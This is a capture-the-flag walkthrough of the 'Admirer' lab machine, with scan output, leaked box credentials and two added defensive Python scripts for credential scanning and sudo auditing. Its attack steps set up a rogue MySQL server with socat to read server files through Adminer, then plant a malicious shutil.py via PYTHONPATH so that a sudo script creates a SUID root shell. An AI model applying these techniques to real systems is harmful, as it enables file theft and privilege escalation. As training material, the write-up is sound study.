NMAP
...

Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-28 10:33 IST
Nmap scan report for 10.10.10.187
Host is up (0.088s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 7.06 seconds
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-28 10:33 IST
Nmap scan report for 10.10.10.187
Host is up (0.087s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
|   256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
|_  256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/admin-dir
|_http-title: Admirer
|_http-server-header: Apache/2.4.25 (Debian)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.49 seconds

HTTP
...

Feroxbuster on port 80

Pasted image 20240128104457.png

credentials.txt->

[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!

contacts.txt

##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb


##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb

# Amy
Email: a.bialik@admirer.htb

# Leonard
Email: l.galecki@admirer.htb



#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb

# Bernadette
Email: b.rauch@admirer.htb

Got into FTP with the above creds:

Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||41624|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0            3405 Dec 02  2019 dump.sql
-rw-r--r--    1 0        0         5270987 Dec 03  2019 html.tar.gz
226 Directory send OK.
ftp> get *

Extracted the .tar.gz file; it looked like a www dir, but I think it's old or from some other web server, because there is no admin-dir/.
Pasted image 20240128105156.png

db_admin.php

➜  utility-scripts cat db_admin.php 
<?php
  $servername = "localhost";
  $username = "waldo";
  $password = "Wh3r3_1s_w4ld0?";

  // Create connection
  $conn = new mysqli($servername, $username, $password);

  // Check connection
  if ($conn->connect_error) {
      die("Connection failed: " . $conn->connect_error);
  }
  echo "Connected successfully";


  // TODO: Finish implementing this or find a better open source alternative
?>
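The db_admin.php above is the classic case of a database password sitting in a file inside the served web tree, and it turned up only because a backup of that tree (html.tar.gz) was left on an anonymous-readable FTP share. A blue team auditing such a backup or webroot would want a quick scanner for that. The following is an added example for these notes, not code from the box or from any tool mentioned on the page; the file tree and the secrets in it are constructed stand-ins, and the only thing it shares with the page is the shape of a PHP credential assignment.

```python
"""Scan an extracted web tree for hard-coded credentials.

Added example for this writeup (not the box's code).  The SAMPLE_TREE below
is a constructed stand-in for an extracted html.tar.gz; every secret in it
is fake.  Values are reported masked so the scanner's own output does not
become another credential leak.
"""
import re
from dataclasses import dataclass

# Assignment shapes found in PHP and dotenv-style config files.
# Group 1 = variable name, group 2 = literal value.
NAME = r"([A-Za-z_]*(?:pass|pwd|secret|token|key)[A-Za-z_]*)"
SECRET_PATTERNS = [
    # PHP:  $password = "..."; / $db_pass = '...';
    re.compile(r"\$" + NAME + r"\s*=\s*['\"]([^'\"]+)['\"]", re.I),
    # PHP:  define('DB_PASSWORD', '...');
    re.compile(r"define\(\s*['\"]" + NAME + r"['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)", re.I),
    # dotenv / ini:  DB_PASSWORD=...
    re.compile(r"^\s*" + NAME + r"\s*=\s*['\"]?([^'\"\s#]+)", re.I | re.M),
]

# Values that are clearly templates rather than live secrets.
PLACEHOLDERS = {"", "changeme", "password", "xxx", "your_password_here"}


@dataclass(frozen=True)
class Hit:
    path: str
    name: str
    masked: str          # the value is never reported in full
    web_reachable: bool  # file lives under the served document root


def mask(value):
    """Keep two characters so a reviewer can recognise the value, hide the rest."""
    return value[:2] + "*" * max(len(value) - 2, 3)


def scan_tree(files, webroot="html/"):
    """files: {relative path: file content}.  Returns one Hit per credential."""
    hits = []
    for path, content in files.items():
        for pattern in SECRET_PATTERNS:
            for m in pattern.finditer(content):
                name, value = m.group(1), m.group(2)
                if value.lower() in PLACEHOLDERS:
                    continue
                hit = Hit(path, name, mask(value), path.startswith(webroot))
                if hit not in hits:
                    hits.append(hit)
    return hits


# Constructed sample tree: a db_admin.php-shaped file under the webroot,
# a WordPress config with one placeholder and one live-looking key,
# and a dotenv file outside the served tree.
SAMPLE_TREE = {
    "html/utility-scripts/db_admin.php": (
        "<?php\n"
        "  $servername = \"localhost\";\n"
        "  $username = \"dbuser\";\n"
        "  $password = \"Fake-Pass-123\";   // constructed value\n"
        "  $conn = new mysqli($servername, $username, $password);\n"
        "?>\n"
    ),
    "html/wp-config.php": (
        "<?php\n"
        "define('DB_PASSWORD', 'changeme');\n"
        "define('AUTH_KEY', 'k3y-constructed');\n"
    ),
    "backup/.env": "MAIL_TOKEN=tok-constructed-9f8e\nAPP_DEBUG=false\n",
}

if __name__ == "__main__":
    for hit in scan_tree(SAMPLE_TREE):
        where = "WEB-REACHABLE" if hit.web_reachable else "off-web"
        print(f"{where:14} {hit.path}: {hit.name} = {hit.masked}")
```

The web_reachable flag is the part worth acting on first: a secret in a file under the document root can be read by anyone who finds the path (here, by listing utility-scripts/), whereas one outside it needs a second weakness such as the exposed backup. The fix in either case is the same: load credentials from a file outside the webroot with restrictive permissions, and never ship backups of the tree to a share that anonymous users can read.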

Admin_task.php
Pasted image 20240128115818.png

I spent time here but I was not able to execute code.

db_admin.php was missing
Pasted image 20240128115912.png

So I started to fuzz for db.php.
Pasted image 20240128120600.png

Pasted image 20240128120617.png

I tried to log in with the credentials we had found so far, but no luck.

But in the server field, if we give our IP and start an nc listener on port 3306, it connects to us.
Pasted image 20240128185950.png

The version, 4.6.2, is vulnerable.

I'll start my MySQL server and use it to authenticate to the target.

GRANT ALL PRIVILEGES ON *.* TO root@10.10.10.187 IDENTIFIED BY 'HelloThere' WITH GRANT OPTION;

create database hello;

use hello;

CREATE TABLE exfil (data VARCHAR(256));

Pasted image 20240128191125.png

I got "connection refused".
Pasted image 20240128191313.png

It's because MySQL does not listen on a routable interface.

I'll use socat, but first I'll edit /etc/mysql/mariadb.conf.d/50-server.cnf; look at the file:
Pasted image 20240128191626.png

The bind-address is 127.0.0.1. The problem here is that when I use socat, even though I am making the request from the target machine, MySQL will think it's localhost. Quite complicated; look at the image below.

➜ Admirer socat TCP-LISTEN:3306,fork,bind=10.10.14.10 TCP:127.0.0.1:3306

When I made the connection from the site:
Pasted image 20240128191925.png

ctflover@localhost is the problem.

So I have to change 127.0.0.1 to 0.0.0.0.

Restart the MySQL service.

Pasted image 20240128194106.png

SQL command:
Pasted image 20240128194207.png

This article explains how to exploit this.

Get index.php into the table we created, exfil.
Pasted image 20240128195201.png

select * from hello.exfil;
Pasted image 20240128195407.png

We found a password in this index.php; this one is different from before.
Pasted image 20240128195530.png

I'll use these creds to log in to SSH.

This password works.
Pasted image 20240128195614.png

waldo@admirer:/opt/scripts$ sudo -l
[sudo] password for waldo: 
Matching Defaults entries for waldo on admirer:
    env_reset, env_file=/etc/sudoenv, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always

User waldo may run the following commands on admirer:
    (ALL) SETENV: /opt/scripts/admin_tasks.sh
waldo@admirer:/opt/scripts$ 

We can run admin_tasks.sh as root and also set environment variables while running it with sudo.
Pasted image 20240128200439.png

It's running backup.py.
Pasted image 20240128200500.png
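From the defender's side, the dangerous combination here is a sudo rule carrying the SETENV tag on a script that hands control to an interpreter: env_reset normally strips PYTHONPATH, but SETENV lets the caller put it back, and Python searches PYTHONPATH before its own standard library. The following audit script is an added example for these notes, not code from the box: it parses `sudo -l` output in the shape shown above and inspects the granted scripts for interpreter launches. The contents of admin_tasks.sh and backup.py are constructed stand-ins (the page only says that option 6 runs backup.py), and the fs dict stands in for reading the real files.

```python
"""Audit `sudo -l` output for SETENV grants on interpreter-driven scripts.

Added example for this writeup, not the box's code.  SUDO_L mirrors the rule
line shown in the notes; the script bodies in FAKE_FS are constructed
stand-ins for admin_tasks.sh and backup.py, whose real contents are not on
the page.
"""
import re
from dataclasses import dataclass

# Interpreters whose module search path is steered by an environment
# variable, and the command-line flags that make them ignore it.
INTERPRETERS = {
    "python": ("PYTHONPATH", {"-I", "-E"}),  # -I isolated mode, -E ignore PYTHON*
    "perl":   ("PERL5LIB",   {"-T"}),        # taint mode ignores PERL5LIB/PERLLIB
}

# "(runas) TAG: TAG: command" as printed by `sudo -l`
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(\S.*)$")
# "python3 -I script" / "/usr/bin/perl -T script": interpreter plus its flags
INVOKE_RE = re.compile(r"\b(python|perl)[\d.]*\b((?:\s+-\S+)*)")
PATH_RE = re.compile(r"/[\w./-]+")


@dataclass(frozen=True)
class Finding:
    command: str      # the sudo-granted command
    script: str       # file in which the interpreter is launched
    interpreter: str
    env_var: str      # variable a SETENV caller could set to hijack imports


def parse_sudo_l(text):
    """Return (runas, tags, command) for every rule line in `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
            tags = [t.rstrip(":") for t in m.group(2).split()]
            rules.append((m.group(1), tags, m.group(3).strip()))
    return rules


def interpreter_launches(path, fs, seen=None):
    """Yield (script, interpreter, flags) for every interpreter invocation
    reachable from `path`, following other scripts the file references."""
    seen = seen if seen is not None else set()
    if path in seen or path not in fs:
        return
    seen.add(path)
    content = fs[path]
    for m in INVOKE_RE.finditer(content):
        yield path, m.group(1), set(m.group(2).split())
    for ref in PATH_RE.findall(content):
        yield from interpreter_launches(ref, fs, seen)


def audit(sudo_l_text, fs):
    """Flag SETENV rules whose command launches an interpreter that would
    honour a caller-supplied module path."""
    findings = []
    for _runas, tags, command in parse_sudo_l(sudo_l_text):
        if "SETENV" not in tags:
            continue                 # env_reset keeps PYTHONPATH out of the env
        for script, interp, flags in interpreter_launches(command.split()[0], fs):
            env_var, safe_flags = INTERPRETERS[interp]
            if flags & safe_flags:
                continue             # interpreter was told to ignore the env
            finding = Finding(command, script, interp, env_var)
            if finding not in findings:
                findings.append(finding)
    return findings


# The rule exactly as `sudo -l` prints it in the notes above.
SUDO_L = """\
User waldo may run the following commands on admirer:
    (ALL) SETENV: /opt/scripts/admin_tasks.sh
"""

# Constructed stand-ins for the two scripts (assumed shape, not the real files).
FAKE_FS = {
    "/opt/scripts/admin_tasks.sh": (
        "#!/bin/bash\n"
        "# option 6 hands off to the backup script\n"
        "python3 /opt/scripts/backup.py &\n"
    ),
    "/opt/scripts/backup.py": (
        "from shutil import make_archive\n"
        "make_archive('/srv/backup/html', 'gztar', '/var/www/html')\n"
    ),
}

# Same tree with the one-flag fix applied: isolated mode ignores PYTHONPATH.
HARDENED_FS = dict(FAKE_FS)
HARDENED_FS["/opt/scripts/admin_tasks.sh"] = "#!/bin/bash\npython3 -I /opt/scripts/backup.py &\n"

if __name__ == "__main__":
    for f in audit(SUDO_L, FAKE_FS):
        print(f"{f.command}: {f.script} launches {f.interpreter} without ignoring {f.env_var}")
```

The two remediations the audit encodes are independent: removing SETENV from the rule closes the door regardless of what the script does, and launching the interpreter with `python3 -I` closes it even if SETENV stays. Doing both is cheap; relying on neither is what the sudo -l output above shows.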

Strategy ->

We'll make our own shutil.py with a make_archive function, which will be malicious.
This can be done because we have the SETENV permission.

My shutil.py in /dev/shm:

import os

# Shadows the standard-library shutil module once /dev/shm is first on PYTHONPATH;
# backup.py's call to make_archive() then lands here and runs as root via sudo.
def make_archive(a, b, c):
    os.system("bash -c 'cp /bin/bash /tmp/bash; chmod 4755 /tmp/bash'")

waldo@admirer:/dev/shm$ sudo PYTHONPATH=/dev/shm /opt/scripts/admin_tasks.sh 

[[[ System Administration Menu ]]]
1) View system uptime
2) View logged in users
3) View crontab
4) Backup passwd file
5) Backup shadow file
6) Backup web data
7) Backup DB
8) Quit
Choose an option: 6
Running backup script in the background, it might take a while...
waldo@admirer:/tmp$ ./bash -p
bash-4.4# cd /root
bash-4.4# cat root.txt
4857966b101076c4ee3795a7a3d14007
bash-4.4#